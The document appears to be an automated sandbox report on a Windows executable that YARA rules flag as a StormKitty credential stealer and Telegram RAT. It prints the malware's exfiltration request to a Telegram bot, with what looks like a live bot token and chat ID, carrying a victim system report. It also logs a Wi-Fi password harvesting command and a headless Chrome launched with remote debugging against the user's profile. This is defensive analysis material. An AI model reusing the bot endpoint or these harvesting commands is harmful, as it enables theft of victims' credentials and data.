                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=0F21C4DE7A1B6788277DD1B17BB36680; _EDGE_S=F=1&SID=02BA5CD7B7DE65FD0E7049B8B6C764A6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC4753OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 30 39 3a 35 39 3a 32 36 2e 32 34 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 35 39 31 38 65 33 64 2d 32 61 38 30 2d 34 62 35 36 2d 62 39 66 62 2d 39 31 34 34 37 39 64 37 34 36 62 34 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 33 37 31 35 37 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T09:59:26.248Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"55918e3d-2a80-4b56-b9fb-914479d746b4","epoch":"25371570"},"app":{"locale":
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=894defba01d84b7ab52e92673e864170&HASH=894d&LV=202501&V=4&LU=1736416767300; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 09:59:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=f3dc76ef801e40cf986f45aa99c39c3f; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 10:29:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 1051
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:26 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  17192.168.2.460920149.154.167.2204437536C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC1554OUTGET /bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/sendMessage?chat_id=-1002445444966&text=%F0%9F%94%8D%20System%20Report%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%F0%9F%97%93%EF%B8%8F%20Date%3A%202025-01-09%204%3A59%3A04%20am%0A%F0%9F%96%A5%EF%B8%8F%20Operating%20System%3A%20Windows%2010%20Pro%20%2864%20Bit%29%0A%F0%9F%91%A4%20User%20Name%3A%20user%0A%F0%9F%92%BB%20Computer%20Name%3A%20618321%0A%F0%9F%8C%90%20IP%20Address%3A%208.46.123.189%0A%F0%9F%8C%8D%20Language%20and%20Region%3A%20%F0%9F%87%A8%F0%9F%87%AD%20-%20en-CH%0A%F0%9F%9B%A1%EF%B8%8F%20AV%3A%20Windows%20Defender.%0A%0A%E2%96%B6%EF%B8%8F%20Keywords%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%20%20%20%E2%88%9F%20Keywords%20%28No%20data%29%0A%0A%E2%96%B6%EF%B8%8F%20Browser%20and%20Application%20Data%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%20%20%20%E2%88%9F%20%F0%9F%8D%AA%20Cookies%3A%2010%0A%20%20%20%E2%88%9F%20%F0%9F%93%9C% [TRUNCATED]
                                                                                                                                                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:27 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                                                                  Content-Length: 1260
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC1260INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 33 31 38 36 37 32 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6e 69 73 74 72 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 69 6e 69 73 74 72 79 30 78 31 32 32 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 34 34 35 34 34 34 39 36 36 2c 22 74 69 74 6c 65 22 3a 22 4d 69 6e 69 73 74 72 79 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 31 36 37 36 37 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 64 30 64 20 53 79 73 74 65 6d 20 52 65 70 6f 72 74 5c 6e 3d 3d
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":61,"from":{"id":7831867283,"is_bot":true,"first_name":"Ministry","username":"Ministry0x122_bot"},"chat":{"id":-1002445444966,"title":"Ministry","type":"supergroup"},"date":1736416767,"text":"\ud83d\udd0d System Report\n==


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  18192.168.2.46092620.42.65.934438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:28 UTC1041OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736416767110&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 5388
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=0F21C4DE7A1B6788277DD1B17BB36680; _EDGE_S=F=1&SID=02BA5CD7B7DE65FD0E7049B8B6C764A6; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:28 UTC5388OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 30 39 3a 35 39 3a 32 37 2e 31 30 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 35 39 31 38 65 33 64 2d 32 61 38 30 2d 34 62 35 36 2d 62 39 66 62 2d 39 31 34 34 37 39 64 37 34 36 62 34 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 33 37 31 35 37 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T09:59:27.109Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"55918e3d-2a80-4b56-b9fb-914479d746b4","epoch":"25371570"},"app":{"locale":
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:28 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=010bb1e9ec1642f8b506f4e145ca530f&HASH=010b&LV=202501&V=4&LU=1736416768132; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 09:59:28 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=b4a0cf111fdc4aab9aa26a4ede2efba7; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 10:29:28 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 1022
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:28 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  19192.168.2.46092720.42.65.934438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:28 UTC1041OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736416767246&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 9889
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=0F21C4DE7A1B6788277DD1B17BB36680; _EDGE_S=F=1&SID=02BA5CD7B7DE65FD0E7049B8B6C764A6; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:28 UTC9889OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 30 39 3a 35 39 3a 32 37 2e 32 34 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 35 39 31 38 65 33 64 2d 32 61 38 30 2d 34 62 35 36 2d 62 39 66 62 2d 39 31 34 34 37 39 64 37 34 36 62 34 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 33 37 31 35 37 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-09T09:59:27.245Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"55918e3d-2a80-4b56-b9fb-914479d746b4","epoch":"25371570"},"app":{"local
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:28 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=93ad02773b5d41e59bfff078b5b814f4&HASH=93ad&LV=202501&V=4&LU=1736416768256; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 09:59:28 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=77c1e27a7a374525b2095b9909b07dc1; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 10:29:28 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 1010
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:28 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                                  Start time:04:58:56
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\bc7EKCf.exe"
                                                                                                                                                                                                                                                                                                                  Imagebase:0xb10000
                                                                                                                                                                                                                                                                                                                  File size:3'032'576 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:C042E73BC713B483058772DABF080733
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                                  Start time:04:59:04
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\bc7EKCf.exe"
                                                                                                                                                                                                                                                                                                                  Imagebase:0xb00000
                                                                                                                                                                                                                                                                                                                  File size:3'032'576 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:C042E73BC713B483058772DABF080733
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                                                  Start time:04:59:06
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                                                  Start time:04:59:06
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7d9970000
                                                                                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                                                  Start time:04:59:07
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                                  Start time:04:59:07
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
